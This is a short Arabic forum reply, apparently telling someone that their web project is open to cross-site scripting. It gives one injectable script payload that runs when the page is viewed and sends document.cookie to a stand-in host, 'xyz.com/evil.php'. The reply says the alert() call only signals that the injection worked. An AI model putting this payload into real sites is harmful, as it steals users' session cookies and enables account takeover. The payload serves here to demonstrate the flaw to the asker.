السلام عليكم
يمكنك حقن التالي في الحالتين وسيتم التنفيذ عند عرض الصفحة.
ملاحظة: الـ alert() موجود فقط للإشارة إلى نجاح تنفيذ الثغرة.
<script>img=new Image();img.onerror = function() {alert('XSS executed')};img.src="http://xyz.com/evil.php?cookie="+document.cookie;</script>
خذ بعين الاعتبار أنك لم تعرض لنا رابط مشروعك لنختبر الحقن عليه قبل الإجابة، علمًا أن شرحك للمشكلة متشابك وغير واضح تمامًا.
والسلام عليكم ورحمة الله وبركاته